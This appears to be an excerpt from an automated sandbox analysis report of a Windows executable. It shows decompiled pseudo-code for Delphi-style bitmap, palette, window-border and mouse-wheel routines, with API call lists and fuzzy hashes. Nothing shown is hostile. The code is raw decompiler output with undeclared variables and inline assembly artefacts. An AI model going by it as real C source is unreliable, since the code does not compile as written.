                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00428E8F
                                                                            • RealizePalette.GDI32(?), ref: 00428E98
                                                                            • SetBkColor.GDI32(?), ref: 00428EA2
                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00428EC6
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00428ED0
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428EE3
                                                                            • DeleteObject.GDI32 ref: 00428EEF
                                                                            • DeleteDC.GDI32(?), ref: 00428F05
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428F20
                                                                            • DeleteDC.GDI32(00000000), ref: 00428F3C
                                                                            • ReleaseDC.USER32 ref: 00428F4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                            • String ID:
                                                                            • API String ID: 332224125-0
                                                                            • Opcode ID: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8
                                                                            • Instruction ID: 9b296df3905ff11574ab74c4800e5112e9892f6b575cab52e3ab6da5b25098aa
                                                                            • Opcode Fuzzy Hash: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8
                                                                            • Instruction Fuzzy Hash: 92513F71F00315AFDB10EBE9DC45FAEB7FCEB08704F51446AB214E7281CA7999508B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                                                                                  E00429A80(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, char* _a4) { 				intOrPtr _v8; 				intOrPtr* _v12; 				struct HDC__* _v16; 				struct HDC__* _v20; 				void* _v24; 				BITMAPINFOHEADER* _v28; 				intOrPtr _v32; 				intOrPtr _v36; 				signed int _v37; 				struct HBITMAP__* _v44; 				void* _v48; 				struct HPALETTE__* _v52; 				struct HPALETTE__* _v56; 				intOrPtr* _v60; 				intOrPtr* _v64; 				signed short _v66; 				signed short _v68; 				signed short _v70; 				signed short _v72; 				void* _v76; 				intOrPtr _v172; 				char _v174; 				intOrPtr _t151; 				signed int _t161; 				signed int _t165; 				intOrPtr _t169; 				signed int _t224; 				intOrPtr _t251; 				intOrPtr* _t255; 				intOrPtr _t261; 				signed int _t298; 				intOrPtr _t301; 				intOrPtr _t302; 				intOrPtr _t307; 				signed int _t328; 				void* _t330; 				void* _t331; 				signed int _t332; 				void* _t333; 				void* _t334; 				void* _t335; 				intOrPtr _t336;  				_t327 = __edi; 				_t334 = _t335; 				_t336 = _t335 + 0xffffff54; 				_t330 = __ecx; 				_v12 = __edx; 				_v8 = __eax; 				_v52 = 0; 				_v44 = 0; 				_v60 = 0; 				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t333); 				_v37 = _v36 == 0xc; 				if(_v37 != 0) { 					_v36 = 0x28; 				} 				_v28 = E00402D0C(_v36 + 0x40c); 				_v64 = _v28; 				_push(_t334); 				_push(0x429fa1); 				_push( *[fs:edx]); 				 *[fs:edx] = _t336; 				_push(_t334); 				_push(0x429f74); 				_push( *[fs:edx]); 				 *[fs:edx] = _t336; 				if(_v37 == 0) { 					 *((intOrPtr*)( *_v12 + 0xc))(); 					_t331 = _t330 - _v36; 					_t151 =  *((intOrPtr*)(_v64 + 0x10)); 					if(_t151 != 3 && _t151 != 0) { 						_v60 = E004038F8(1); 						if(_a4 == 0) { 							E00403264( &_v174, 0xe); 							_v174 = 0x4d42; 							_v172 = _v36 + _t331; 							_a4 =  &_v174; 						} 						 *((intOrPtr*)( 
*_v60 + 0x10))(); 						 *((intOrPtr*)( *_v60 + 0x10))(); 						 *((intOrPtr*)( *_v60 + 0x10))(); 						E0041C924(_v60,  *_v60, _v12, _t327, _t331, _t331, 0); 						 *((intOrPtr*)( *_v60 + 0x14))(); 						_v12 = _v60; 					} 				} else { 					 *((intOrPtr*)( *_v12 + 0xc))(); 					_t261 = _v64; 					E00403264(_t261, 0x28); 					_t251 = _t261; 					 *(_t251 + 4) = _v72 & 0x0000ffff; 					 *(_t251 + 8) = _v70 & 0x0000ffff; 					 *((short*)(_t251 + 0xc)) = _v68 & 0x0000ffff; 					 *((short*)(_t251 + 0xe)) = _v66 & 0x0000ffff; 					_t331 = _t330 - 0xc; 				} 				_t255 = _v64; 				 *_t255 = _v36; 				_v32 = _v28 + _v36; 				if( *((short*)(_t255 + 0xc)) != 1) { 					E00426B00(); 				} 				if(_v36 == 0x28) { 					_t224 =  *(_t255 + 0xe) & 0x0000ffff; 					if(_t224 == 0x10 || _t224 == 0x20) { 						if( *((intOrPtr*)(_t255 + 0x10)) == 3) { 							E0041C8B4(_v12, 0xc, _v32); 							_v32 = _v32 + 0xc; 							_t331 = _t331 - 0xc; 						} 					} 				} 				if( *(_t255 + 0x20) == 0) { 					 *(_t255 + 0x20) = E00426D84( *(_t255 + 0xe) & 0x0000ffff); 				} 				_t328 = _v37 & 0x000000ff; 				_t79 = _t328 + 0x461ef0; // 0xc08b0304 				E0041C8B4(_v12,  *(_t255 + 0x20) * ( *_t79 & 0x000000ff), _v32); 				_t83 = _t328 + 0x461ef0; // 0xc08b0304 				_t332 = _t331 -  *(_t255 + 0x20) * ( *_t83 & 0x000000ff); 				if( *(_t255 + 0x14) == 0 ||  *((intOrPtr*)(_t255 + 0x10)) == 0) { 					_t298 =  *(_t255 + 0xe) & 0x0000ffff; 					_t161 = E00426DA4( *((intOrPtr*)(_t255 + 4)), 0x20, _t298); 					asm("cdq"); 					 *(_t255 + 0x14) = _t161 * (( *(_t255 + 8) ^ _t298) - _t298); 				} 				_t165 =  *(_t255 + 0x14); 				if(_t332 > _t165) { 					_t332 = _t165; 				} 				if(_v37 != 0) { 					E00427050(_v32); 				} 				_v16 = E00426C14(GetDC(0)); 				_push(_t334); 				_push(0x429eef); 				_push( *[fs:edx]); 				 *[fs:edx] = _t336; 				_t169 =  *((intOrPtr*)(_v64 + 0x10)); 				if(_t169 == 0 || _t169 == 3) { 					if( *0x461c5c == 0) { 						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0); 						if(_v44 == 0 
|| _v24 == 0) { 							if(GetLastError() != 0) { 								E0040D764(); 							} else { 								E00426B00(); 							} 						} 						_push(_t334); 						_push( *[fs:eax]); 						 *[fs:eax] = _t336; 						E0041C8B4(_v12, _t332, _v24); 						_pop(_t301); 						 *[fs:eax] = _t301; 						_t302 = 0x429ebe; 						 *[fs:eax] = _t302; 						_push(0x429ef6); 						return ReleaseDC(0, _v16); 					} else { 						goto L28; 					} 				} else { 					L28: 					_v20 = 0; 					_v24 = E00402D0C(_t332); 					_push(_t334); 					_push(0x429e57); 					_push( *[fs:edx]); 					 *[fs:edx] = _t336; 					E0041C8B4(_v12, _t332, _v24); 					_v20 = E00426C14(CreateCompatibleDC(_v16)); 					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1)); 					_v56 = 0; 					_t198 =  *((intOrPtr*)(_v64 + 0x20)); 					if( *((intOrPtr*)(_v64 + 0x20)) > 0) { 						_v52 = E0042730C(0, _t198); 						_v56 = SelectPalette(_v20, _v52, 0); 						RealizePalette(_v20); 					} 					_push(_t334); 					_push(0x429e2b); 					_push( *[fs:edx]); 					 *[fs:edx] = _t336; 					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0); 					if(_v44 == 0) { 						if(GetLastError() != 0) { 							E0040D764(); 						} else { 							E00426B00(); 						} 					} 					_pop(_t307); 					 *[fs:eax] = _t307; 					_push(0x429e32); 					if(_v56 != 0) { 						SelectPalette(_v20, _v56, 0xffffffff); 					} 					return DeleteObject(SelectObject(_v20, _v48)); 				} 			}                        


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00429CEE
                                                                            • CreateCompatibleDC.GDI32(00000001), ref: 00429D53
                                                                            • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00429D68
                                                                            • SelectObject.GDI32(?,00000000), ref: 00429D72
                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00429DA2
                                                                            • RealizePalette.GDI32(?), ref: 00429DAE
                                                                            • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00429DD2
                                                                            • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00429E2B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00429DE0
                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00429E12
                                                                            • SelectObject.GDI32(?,?), ref: 00429E1F
                                                                            • DeleteObject.GDI32(00000000), ref: 00429E25
                                                                            Strings
                                                                            • ( , xrefs: 00429C39
                                                                            • BM , xrefs: 00429BA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                            • String ID: ($BM
                                                                            • API String ID: 2831685396-2980357723
                                                                            • Opcode ID: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb
                                                                            • Instruction ID: 5f09fdd2a9c8d3bf44ec303fddff0b4bf25abaa9eceda00dd836569603864da6
                                                                            • Opcode Fuzzy Hash: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb
                                                                            • Instruction Fuzzy Hash: FFD12970B002189FDF14EFA9D885BAEBBF5EF48304F55846AE904A7395D7389C40CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 62%
                                                                                                                                  E0044323C(intOrPtr* __eax, intOrPtr __edx) { 				intOrPtr* _v8; 				intOrPtr _v12; 				struct HDC__* _v16; 				struct tagRECT _v32; 				struct tagRECT _v48; 				signed int _v60; 				signed int _v64; 				struct HRGN__* _t169; 				signed int _t204; 				intOrPtr* _t210; 				intOrPtr* _t213; 				intOrPtr _t220; 				signed int _t223; 				intOrPtr _t247; 				signed int _t248; 				void* _t263; 				void* _t266; 				void* _t268; 				intOrPtr _t269;  				_t266 = _t268; 				_t269 = _t268 + 0xffffffc4; 				_v12 = __edx; 				_v8 = __eax; 				if( *(_v8 + 0x195) != 0 ||  *(_v8 + 0x19c) > 0) { 					_v16 = GetWindowDC(E004423F8(_v8)); 					_push(_t266); 					_push(0x4434ef); 					_push( *[fs:ecx]); 					 *[fs:ecx] = _t269; 					GetClientRect(E004423F8(_v8),  &_v32); 					GetWindowRect(E004423F8(_v8),  &_v48); 					MapWindowPoints(0, E004423F8(_v8),  &_v48, "true"); 					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top)); 					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					InflateRect( &_v32,  *(_v8 + 0x19c),  *(_v8 + 0x19c)); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					_t223 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); 					if((_t223 & 0x00200000) != 0) { 						_t213 =  *0x462c28; // 0x466310 						_v48.right = _v48.right +  *((intOrPtr*)( *_t213))(0x14); 					} 					if((_t223 & 0x00100000) != 0) { 						_t210 =  *0x462c28; // 0x466310 						_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t210))(0x15); 					} 					if( *(_v8 + 0x195) != 0) { 						_t263 = 0; 						_t248 =  *(_v8 + 0x193) & 0x000000ff; 						if(_t248 != 0) { 							_t263 = 0 +  *((intOrPtr*)(_v8 + 0x198)); 						} 						_t204 =  *(_v8 + 0x194) & 0x000000ff; 						if(_t204 != 0) { 							_t263 = _t263 +  *((intOrPtr*)(_v8 + 0x198)); 						} 						if(( *(_v8 + 
0x192) & 0x00000001) != 0) { 							_v48.left = _v48.left - _t263; 						} 						if(( *(_v8 + 0x192) & 0x00000002) != 0) { 							_v48.top = _v48.top - _t263; 						} 						if(( *(_v8 + 0x192) & 0x00000004) != 0) { 							_v48.right = _v48.right + _t263; 						} 						if(( *(_v8 + 0x192) & 0x00000008) != 0) { 							_v48.bottom = _v48.bottom + _t263; 						} 						DrawEdge(_v16,  &_v48,  *(0x46262c + (_t248 & 0x0000007f) * 4) |  *(0x46263c + (_t204 & 0x0000007f) * 4),  *(_v8 + 0x192) & 0x000000ff |  *(0x46264c + ( *(_v8 + 0x195) & 0x000000ff) * 4) |  *(0x46265c + ( *(_v8 + 0x1d9) & 0x000000ff) * 4) | 0x00002000); 					} 					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					_t169 =  *(_v12 + 4); 					if(_t169 != 1) { 						GetRgnBox(_t169,  &_v32); 						MapWindowPoints(0, E004423F8(_v8),  &_v32, "true"); 						IntersectRect( &_v48,  &_v48,  &_v32); 						OffsetRect( &_v48,  ~_v64,  ~_v60); 					} else { 						OffsetRect( &_v48,  ~_v48,  ~(_v48.top)); 					} 					FillRect(_v16,  &_v48, E004261BC( *((intOrPtr*)(_v8 + 0x1a4)))); 					_pop(_t247); 					 *[fs:eax] = _t247; 					_push(0x4434f6); 					return ReleaseDC(E004423F8(_v8), _v16); 				} else { 					 *((intOrPtr*)( *_v8 - 0x10))(); 					_t220 = E0042DC7C(E0042DB74()); 					if(_t220 != 0) { 						_t220 = _v8; 						if(( *(_t220 + 0x52) & 0x00000002) != 0) { 							_t220 = E0042E248(E0042DB74(), 0, _v8); 						} 					} 					return _t220; 				} 			}                        

                                                                            0x004433cd
                                                                            0x00443420
                                                                            0x00443420
                                                                            0x00443439
                                                                            0x00443444
                                                                            0x00443445
                                                                            0x00443446
                                                                            0x00443447
                                                                            0x0044344b
                                                                            0x00443451
                                                                            0x00443472
                                                                            0x00443488
                                                                            0x00443499
                                                                            0x004434ae
                                                                            0x00443453
                                                                            0x00443463
                                                                            0x00443463
                                                                            0x004434ca
                                                                            0x004434d1
                                                                            0x004434d4
                                                                            0x004434d7
                                                                            0x004434ee
                                                                            0x004434f6
                                                                            0x004434fe
                                                                            0x00443506
                                                                            0x0044350d
                                                                            0x0044350f
                                                                            0x00443516
                                                                            0x00443522
                                                                            0x00443522
                                                                            0x00443516
                                                                            0x0044352d
                                                                            0x0044352d

                                                                            APIs
                                                                            • GetWindowDC.USER32(00000000), ref: 00443270
                                                                            • GetClientRect.USER32 ref: 00443293
                                                                            • GetWindowRect.USER32 ref: 004432A5
                                                                            • MapWindowPoints.USER32 ref: 004432BB
                                                                            • OffsetRect.USER32(?,?,?), ref: 004432D0
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?), ref: 004432E9
                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 00443307
                                                                            • GetWindowLongA.USER32 ref: 00443321
                                                                            • DrawEdge.USER32(?,?,?,00000008), ref: 00443420
                                                                            • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00443439
                                                                            • OffsetRect.USER32(?,?,?), ref: 00443463
                                                                            • GetRgnBox.GDI32(?,?), ref: 00443472
                                                                            • MapWindowPoints.USER32 ref: 00443488
                                                                            • IntersectRect.USER32 ref: 00443499
                                                                            • OffsetRect.USER32(?,?,?), ref: 004434AE
                                                                            • FillRect.USER32 ref: 004434CA
                                                                            • ReleaseDC.USER32 ref: 004434E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                            • String ID:
                                                                            • API String ID: 2490777911-0
                                                                            • Opcode ID: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008
                                                                            • Instruction ID: 7b120e4924686e31309899fdc82388f4ae83de811d5366100fd5c7bdcafe2d3f
                                                                            • Opcode Fuzzy Hash: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008
                                                                            • Instruction Fuzzy Hash: 5EA12E71E00148AFDB01DFA9C986EDEB7F9AF09704F1440A6F915F7291C679AE01CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
E00429268(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
    intOrPtr _v8;
    struct HPALETTE__* _v12;
    char _v13;
    struct tagPOINT _v21;
    struct HDC__* _v28;
    void* _v32;
    struct HPALETTE__* _t78;
    signed int _t84;
    signed int _t85;
    signed int _t86;
    char _t87;
    void* _t140;
    intOrPtr* _t170;
    intOrPtr _t184;
    intOrPtr _t186;
    int* _t190;
    intOrPtr _t192;
    void* _t194;
    void* _t195;
    intOrPtr _t196;

    _t171 = __ecx;
    _t194 = _t195;
    _t196 = _t195 + 0xffffffe4;
    _t190 = __ecx;
    _v8 = __edx;
    _t170 = __eax;
    _t192 =  *((intOrPtr*)(__eax + 0x28));
    E004268F8(_v8, __ecx,  *0x4294b4 & 0x000000ff, __ecx);
    E004297F8(_t170);
    _v12 = 0;
    _v13 = 0;
    _t78 =  *(_t192 + 0x10);
    if(_t78 != 0) {
        _v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
        RealizePalette( *(_v8 + 4));
        _v13 = 1;
    }
    _push(GetDeviceCaps( *(_v8 + 4), 0xc));
    _t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
    _pop(_t85);
    _t86 = _t85 * _t84;
    if(_t86 > 8) {
        L4:
        _t87 = 0;
    } else {
        _t171 =  *(_t192 + 0x28) & 0x0000ffff;
        if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
            _t87 = 1;
        } else {
            goto L4;
        }
    }
    if(_t87 == 0) {
        if(E004295F4(_t170) == 0) {
            SetStretchBltMode(E0042681C(_v8), 3);
        }
    } else {
        GetBrushOrgEx( *(_v8 + 4),  &_v21);
        SetStretchBltMode( *(_v8 + 4), 4);
        SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
    }
    _push(_t194);
    _push(0x4294a6);
    _push( *[fs:eax]);
     *[fs:eax] = _t196;
    if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
        E00429798(_t170, _t171);
    }
    E004268F8(E00429538(_t170), _t171,  *0x4294b4 & 0x000000ff, _t190);
    if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
        StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E00429538(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
        _pop(_t184);
         *[fs:eax] = _t184;
        _push(0x4294ad);
        if(_v13 != 0) {
            return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
        }
        return 0;
    } else {
        _v32 = 0;
        _v28 = 0;
        _push(_t194);
        _push(0x42943b);
        _push( *[fs:eax]);
         *[fs:eax] = _t196;
        _v28 = E00426C14(CreateCompatibleDC(0));
        _v32 = SelectObject(_v28,  *(_t192 + 0xc));
        E00426DC4( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E00429538(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
        _t140 = 0;
        _pop(_t186);
         *[fs:eax] = _t186;
        _push(0x429480);
        if(_v32 != 0) {
            _t140 = SelectObject(_v28, _v32);
        }
        if(_v28 != 0) {
            return DeleteDC(_v28);
        }
        return _t140;
    }
}


                                                                            APIs
                                                                              • Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D
                                                                              • Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891
                                                                              • Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C
                                                                            • SelectPalette.GDI32(?,?,000000FF), ref: 004292AB
                                                                            • RealizePalette.GDI32(?), ref: 004292BA
                                                                            • GetDeviceCaps.GDI32(?,0000000C), ref: 004292CC
                                                                            • GetDeviceCaps.GDI32(?,0000000E), ref: 004292DB
                                                                            • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042930E
                                                                            • SetStretchBltMode.GDI32(?,00000004), ref: 0042931C
                                                                            • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00429334
                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 00429351
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004293B2
                                                                            • SelectObject.GDI32(?,?), ref: 004293C7
                                                                            • SelectObject.GDI32(?,00000000), ref: 00429426
                                                                            • DeleteDC.GDI32(00000000), ref: 00429435
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                            • String ID:
                                                                            • API String ID: 2414602066-0
                                                                            • Opcode ID: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f
                                                                            • Instruction ID: d82af69fe42d34c23c978d2582e61c5ab2b2549b478e9a14ed03732d0c903b0f
                                                                            • Opcode Fuzzy Hash: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f
                                                                            • Instruction Fuzzy Hash: 66714975B04214AFDB10EFA9D985F5AB7F8EF08304F51856AB509E7281D638ED018B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
E00426C24(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
    void* _v8;
    int _v12;
    int _v16;
    struct HBITMAP__* _v20;
    struct HDC__* _v24;
    struct HDC__* _v28;
    struct HDC__* _v32;
    int _v48;
    int _v52;
    void _v56;
    void* _t78;
    intOrPtr _t85;
    intOrPtr _t86;
    void* _t91;
    void* _t93;
    void* _t94;
    intOrPtr _t95;

    _t93 = _t94;
    _t95 = _t94 + 0xffffffcc;
    asm("movsd");
    asm("movsd");
    _t77 = __ecx;
    _v8 = __eax;
    _v28 = CreateCompatibleDC(0);
    _v32 = CreateCompatibleDC(0);
    _push(_t93);
    _push(0x426d72);
    _push( *[fs:eax]);
     *[fs:eax] = _t95;
    GetObjectA(_v8, 0x18,  &_v56);
    if(__ecx == 0) {
        _v24 = GetDC(0);
        if(_v24 == 0) {
            E00426B6C(_t77);
        }
        _push(_t93);
        _push(0x426ce1);
        _push( *[fs:eax]);
         *[fs:eax] = _t95;
        _v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
        if(_v20 == 0) {
            E00426B6C(_t77);
        }
        _pop(_t85);
         *[fs:eax] = _t85;
        _push(0x426ce8);
        return ReleaseDC(0, _v24);
    } else {
        _v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
        if(_v20 != 0) {
            _t78 = SelectObject(_v28, _v8);
            _t91 = SelectObject(_v32, _v20);
            StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
            if(_t78 != 0) {
                SelectObject(_v28, _t78);
            }
            if(_t91 != 0) {
                SelectObject(_v32, _t91);
            }
        }
        _pop(_t86);
         *[fs:eax] = _t86;
        _push(0x426d79);
        DeleteDC(_v28);
        return DeleteDC(_v32);
    }
}


                                                                            APIs
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00426C3B
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00426C45
                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00426C65
                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00426C7C
                                                                            • GetDC.USER32(00000000), ref: 00426C88
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00426CB5
                                                                            • ReleaseDC.USER32 ref: 00426CDB
                                                                            • SelectObject.GDI32(?,?), ref: 00426CF6
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426D05
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00426D31
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426D3F
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426D4D
                                                                            • DeleteDC.GDI32(?), ref: 00426D63
                                                                            • DeleteDC.GDI32(?), ref: 00426D6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                            • String ID:
                                                                            • API String ID: 644427674-0
                                                                            • Opcode ID: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d
                                                                            • Instruction ID: f7b92c2e99590a9d5cfcba79e299e5576af21b756abce57799db81c34b4bedf2
                                                                            • Opcode Fuzzy Hash: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d
                                                                            • Instruction Fuzzy Hash: AC41F271F04219AFDB10EBE9D841FAFB7BCEB09704F524466B614F7281C67959108B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004073BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
    intOrPtr* _v8;
    struct HWND__* _t19;
    int* _t20;
    int* _t26;
    int* _t27;

    _t26 = _t20;
    _t27 = __edx;
    _v8 = __eax;
    _t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
    *_v8 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
    *_t27 = RegisterWindowMessageA("MSH_WHEELSUPPORT_MSG");
    *_t26 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
    if( *_t27 == 0 || _t19 == 0) {
        *_a8 = 0;
    } else {
        *_a8 = SendMessageA(_t19, *_t27, 0, 0);
    }
    if( *_t26 == 0 || _t19 == 0) {
        *_a4 = 3;
    } else {
        *_a4 = SendMessageA(_t19, *_t26, 0, 0);
    }
    return _t19;
}

                                                                            APIs
                                                                            • FindWindowA.USER32 ref: 004073D4
                                                                            • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073E0
                                                                            • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073EF
                                                                            • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073FB
                                                                            • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407413
                                                                            • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407437
                                                                            Strings
                                                                            • MSH_WHEELSUPPORT_MSG , xrefs: 004073EA
                                                                            • MouseZ , xrefs: 004073CF
                                                                            • Magellan MSWHEEL , xrefs: 004073CA
                                                                            • MSH_SCROLL_LINES_MSG , xrefs: 004073F6
                                                                            • MSWHEEL_ROLLMSG , xrefs: 004073DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
